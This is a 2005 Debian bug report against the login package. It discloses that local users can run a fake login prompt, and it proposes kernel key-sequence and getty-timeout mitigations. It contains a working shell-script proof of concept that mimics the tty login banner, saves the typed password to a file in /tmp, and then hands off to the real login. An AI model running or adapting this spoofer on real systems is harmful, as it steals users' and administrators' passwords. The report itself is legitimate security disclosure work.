[Pkg-shadow-devel] Bug#305600: login is vulnerable to local pishing attacks

Gerhard Schrenk Gerhard Schrenk <gps@mittelerde.physik.uni-konstanz.de>, 305600@bugs.debian.org
Thu, 21 Apr 2005 02:33:35 +0200 

Package: login
Version: 1:4.0.3-30.7
Severity: important
Tags: security

Every local user can simply start a little program that imitates login and
grabs the password pretending it's wrong. It's really hard for the average user
to spot the difference  and to make sure that he really didn't mistype the
password.  Most users have no read access to /var/log/auth.log and thus cannot
check afterwards.  If the attacker crashes X so that it doesn't restart
(unreproducible but quite easy for users who have reached their quota limit...)
and disable ssh (pulling of the network cable) you have good chances to get the
password of your local admin/root.

Proof of concept:

#!/bin/sh
# start with exec ./scriptname
trap '' INT TSTP
clear
echo
echo "Debian GNU/Linux 3.1 medusa tty1"
echo
read -p "medusa login: " user
stty -echo
read -p "Password: " nosecret
stty echo
echo
echo $nosecret > /tmp/nosecret
sleep 3
echo "Login incorrect"
echo
exec login

IMHO the easiast security enhancement for password based local 
authentication seems to be (anyone better ideas?) keysequences that can
only be catched by the kernel or apps that are suid root.

For example one can put the line
  kb::kbrequest:fuser -KILL -ksn file /dev/tty$(fgconsole)
in /etc/inittab. Then one *can* "zap" every time to respawn getty and 
login.

In a multiuser (lab-)environment it would be desirable if the admin
could enforce such a safe keysequence before getty/login starts. I have
played with 'getty -t' and/or s/respawn/once/ in /etc/inittab but yet
not found a satisfying solution.

The best solution I found was to spawn the getty with an timeout, e.g.
  3:23:respawn:/sbin/getty -t 60 38400 tty3
and to patch the default getty (agetty.c in util-linux) with an additional
signal-handler for SIGALRM. Now the user *must* first kill the outimed getty
with the safe(?) kbrequest. Quick 'n dirty idea:

sa.sa_handler = sigalrm_handler;
sigaction (SIGALRM, &sa, NULL);
...
static void sigalrm_handler(int sig) {
  sigset_t nset;
  raise(SIGSTOP);
}

Since I don't yet know the *right* debian default solution I open
this bug against login.

-- Gerhard

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.11.6-clients
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages login depends on:
ii  libc6                       2.3.2.ds1-20 GNU C Library: Shared libraries an
ii  libpam-modules              0.76-22      Pluggable Authentication Modules f
ii  libpam-runtime              0.76-22      Runtime support for the PAM librar
ii  libpam0g                    0.76-22      Pluggable Authentication Modules l

-- no debconf information